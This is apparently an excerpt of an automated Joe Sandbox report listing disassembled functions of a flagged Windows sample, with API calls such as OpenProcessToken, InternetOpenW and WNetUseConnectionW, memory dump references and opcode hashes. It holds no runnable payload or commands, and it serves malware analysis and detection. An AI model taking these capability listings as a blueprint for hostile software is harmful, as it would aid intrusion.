                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: a8bc07656948f4a814a5490ef905568b31fcfd47c2f4c424ce44d003cfe2be49
                    • Instruction ID: fbc6b7cf1626eba363c444e1bda8ec10f3ebbe660d365946df2e0d7181839f90
                    • Opcode Fuzzy Hash: a8bc07656948f4a814a5490ef905568b31fcfd47c2f4c424ce44d003cfe2be49
                    • Instruction Fuzzy Hash: 83E0C931546228BADB205FA2DC0DEE77F6CEF167A1F048126F50A95460C77AC540DBA5
                    Function 00752218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00752231
                    • SetTextColor.GDI32(?,000000FF), ref: 0075223B
                    • SetBkMode.GDI32(?,00000001), ref: 00752250
                    • GetStockObject.GDI32(00000005), ref: 00752258
                    • GetWindowDC.USER32(?,00000000), ref: 0078C0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0078C0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 0078C0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 0078C112
                    • GetPixel.GDI32(00000000,?,?), ref: 0078C132
                    • ReleaseDC.USER32(?,00000000), ref: 0078C13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 6a289215e7156f1b18ac62af9f3754e43af0585235b2a9625f07f1754f2269dd
                    • Instruction ID: 592ed5365718fc2e65e0901702fcf2050a13c80c7e841c288c9780cd2b08501d
                    • Opcode Fuzzy Hash: 6a289215e7156f1b18ac62af9f3754e43af0585235b2a9625f07f1754f2269dd
                    • Instruction Fuzzy Hash: 3FE06531540248EADB215F64FC0D7D83B20EB05332F04C367FA6A880E187764594DB21
                    Function 007A8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 007A8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,007A882E), ref: 007A8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007A882E), ref: 007A8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,007A882E), ref: 007A8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                    • Instruction ID: e4c69986a3c7c95877fe52438789d1ca0f5266c372e07945ba9716d33610f31b
                    • Opcode Fuzzy Hash: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                    • Instruction Fuzzy Hash: 07E04F366432119BD7605FB06E0CB563BB8AF51BA2F09C869E246CA040DA3884418B65
                    Function 00792187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00792187
                    • GetDC.USER32(00000000), ref: 00792191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007921B1
                    • ReleaseDC.USER32(?), ref: 007921D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 821f079b362de2e0c981e866eb80417a2b19784eeca311226b7105448dce3e1f
                    • Instruction ID: 54a21f0a7d9531e628fad1dcf01c4d0da4ef1071eb70253f05409471b0d44c9e
                    • Opcode Fuzzy Hash: 821f079b362de2e0c981e866eb80417a2b19784eeca311226b7105448dce3e1f
                    • Instruction Fuzzy Hash: 11E0CAB5801208EFDB01AFA0D808AAD7BB1EB4C351F10C42AE95AA7620CB7C82429F45
                    Function 0079219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 0079219B
                    • GetDC.USER32(00000000), ref: 007921A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007921B1
                    • ReleaseDC.USER32(?), ref: 007921D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: cbaf2f29604023c9c95d0d1f567826ed2f6508e04335e1e4227ebf3460275e8c
                    • Instruction ID: 8b29249524a1df68e058ca2cf7166af5b05e9f95cea6172fd591891a26551f88
                    • Opcode Fuzzy Hash: cbaf2f29604023c9c95d0d1f567826ed2f6508e04335e1e4227ebf3460275e8c
                    • Instruction Fuzzy Hash: CBE0EEB5801204EFCB01AFA0CC0869D7BF1EB4C311F10C42AF95AA7620CB7C92419F44
                    Function 007563A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: %~
                    • API String ID: 0-3145668672
                    • Opcode ID: cdad68261e83f959bb87685e8dbdba160dcc36655c3a41a63caf3eb1ac09439f
                    • Instruction ID: 1c51f1b87874b807c615f98aebcaa72d86ae0b5aad3801cec12ec6fc06312ad2
                    • Opcode Fuzzy Hash: cdad68261e83f959bb87685e8dbdba160dcc36655c3a41a63caf3eb1ac09439f
                    • Instruction Fuzzy Hash: EDB1B271900109DBCF14EF94C4959FDB7B4FF44312F90402AED06A7295EBB89E9ACB91
                    Function 007BB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • __wcsnicmp.LIBCMT ref: 007BB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: b2b4748e3293a5abc6ef41ba7dafb19063a186210b89c1f4c6078a4b529ba7a7
                    • Instruction ID: 7901a228d66b9a402db53e2ee9007dde1e87a40c7449354d4283d9ffb3737d93
                    • Opcode Fuzzy Hash: b2b4748e3293a5abc6ef41ba7dafb19063a186210b89c1f4c6078a4b529ba7a7
                    • Instruction Fuzzy Hash: E6614E75A00215EFCB14DF94C885EEEB7F4EB48310F15805AF946AB291DBB8AE44CB50
                    Function 00798A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oav
                    • API String ID: 4104443479-1091017984
                    • Opcode ID: 19178e50488fbb08f91eeb693d950218bd125f812b4a0af14f077349043ee815
                    • Instruction ID: 377a5864d7a163cbd5b02aee29dc58c01efeb03546544f70fd4144da69e5598b
                    • Opcode Fuzzy Hash: 19178e50488fbb08f91eeb693d950218bd125f812b4a0af14f077349043ee815
                    • Instruction Fuzzy Hash: 3A5150B0900609DFCF64CF68D884AAEBBF1FF45304F14852AE85AD7350EB39A955CB51
                    Function 00762AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00762AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00762AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: b88dacca66b384dd313bfb705c0d96fa083d94af6ef8eace7dfab5221100898c
                    • Instruction ID: c10478231e65e06d0dedd026042e2cedee2f0d4663ce11b89d5d79a0f2cea47f
                    • Opcode Fuzzy Hash: b88dacca66b384dd313bfb705c0d96fa083d94af6ef8eace7dfab5221100898c
                    • Instruction Fuzzy Hash: B5515871418745DBD320AF10D88ABABBBE8FF84311F42885DF6E9510A1DB798529CB26
                    Function 007B99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0075506B: __fread_nolock.LIBCMT ref: 00755089
                    • _wcscmp.LIBCMT ref: 007B9AAE
                    • _wcscmp.LIBCMT ref: 007B9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: f07f05e72fda78fcef589da2da584058933d540d8a8c8b6adaad8e5138ad9055
                    • Instruction ID: 76132c69fbd74f36d0057e811895a6b5be4293d0c69e8b7a774a565e0619c552
                    • Opcode Fuzzy Hash: f07f05e72fda78fcef589da2da584058933d540d8a8c8b6adaad8e5138ad9055
                    • Instruction Fuzzy Hash: B641B871A00659FADF20AAA4DC49FEFB7B9DF45710F004069BA14A71C1D6B99A0487A1
                    Function 007C2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007C2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007C28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: 95ea1a0e4ae90e4f0a83ceb6f4b5f3edc34070478d361a5dde5fc342d289447a
                    • Instruction ID: cfae493e9685a94a706f0f7823618325533a29209d4d443dc4383956f56bacb9
                    • Opcode Fuzzy Hash: 95ea1a0e4ae90e4f0a83ceb6f4b5f3edc34070478d361a5dde5fc342d289447a
                    • Instruction Fuzzy Hash: 00311971800119EBCF05EFA1DC89EEEBFB9FF08310F104029E815A6166DB756A56DBA0
                    Function 007D6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 007D6D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007D6DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 055a16870b1a5ce2050aa1ee11e433090bcce0bbfe62bceab84a876a4325e854
                    • Instruction ID: b785b1260039b3c8498fbfa4b21cf37a2824e44aab7b9ee79ee51454222b7821
                    • Opcode Fuzzy Hash: 055a16870b1a5ce2050aa1ee11e433090bcce0bbfe62bceab84a876a4325e854
                    • Instruction Fuzzy Hash: 22319E71200204AEDF109F24DC84AFB77B9FF48720F10861AF9A697290DB79AC91DB64
                    Function 007B2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007B2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: e18d1a2c1110369198461d687dd54111c34addfc0fde4653c36b5b65e7888e21
                    • Instruction ID: 8d3ed3b4cb7c632cae3e02c08576932d6ba82ca300de9f334982ac9a4ac8dd7a
                    • Opcode Fuzzy Hash: e18d1a2c1110369198461d687dd54111c34addfc0fde4653c36b5b65e7888e21
                    • Instruction Fuzzy Hash: A6310631601305EBEB248F49C84DBEEBBB9FF45340F24402AE985D61A2E778D942CB51
                    Function 007D6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007D69D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D69DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: da67a36222d0f4362b289d8273fd7fbc3054005e74688580fd77bb678d9a4ee7
                    • Instruction ID: 656af422ff626d9fe6b232fea0c161e462a850e57093e4ea4882fcdfff615bf8
                    • Opcode Fuzzy Hash: da67a36222d0f4362b289d8273fd7fbc3054005e74688580fd77bb678d9a4ee7
                    • Instruction Fuzzy Hash: BB11C471700208AFEF119F14CCA0EFB377EEB883A4F11412AF95897390D679AC5187A0
                    Function 007D6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                      • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                      • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                    • GetWindowRect.USER32(00000000,?), ref: 007D6EE0
                    • GetSysColor.USER32(00000012), ref: 007D6EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: fcea34d3060ac7e6f8e87951e19b6a2decf939835cb842eb9364e6464435cc5f
                    • Instruction ID: 46bb6f9dd38ae8cc38cbc69f3e5775684458fd245c71b6d727248258fca1edd5
                    • Opcode Fuzzy Hash: fcea34d3060ac7e6f8e87951e19b6a2decf939835cb842eb9364e6464435cc5f
                    • Instruction Fuzzy Hash: 6C216A72610209AFDB04DFA8DD45AFA7BB8FB08315F04462AFD55D3250E738E861DB60
                    Function 007D6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 007D6C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007D6C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 54b1a9cbbb5d5fca34e29d2e60f78a10194a7c486d1138f5aeaa15bae3b8d4ba
                    • Instruction ID: 7774ff2ebca401b3ed5e505274f9ceb899d051457e3040ef3daef902075db16e
                    • Opcode Fuzzy Hash: 54b1a9cbbb5d5fca34e29d2e60f78a10194a7c486d1138f5aeaa15bae3b8d4ba
                    • Instruction Fuzzy Hash: BB11BCB1101208ABEB108F64DC45AFB3B79EB04378F208726F965D32E0C779EC909B60
                    Function 007B2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007B2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007B2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 4c869c815c1e82a1a62a466a52aca629dfb14b7cc7cd8a9df98677e816f48c39
                    • Instruction ID: 98e85c6aae3b383a3a861d3e7a285b3d9f35e7bd33f775fd86db1f54fdda133a
                    • Opcode Fuzzy Hash: 4c869c815c1e82a1a62a466a52aca629dfb14b7cc7cd8a9df98677e816f48c39
                    • Instruction Fuzzy Hash: 92119071902124AFDB20DB58DC48FE977B9EF05310F1840B5E865A72A2E7B8EE06C791
                    Function 007C24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 14eaea81888fc83a3747d1a6e115ab3d66b35e7ca3710d127aed6accd8240c6f
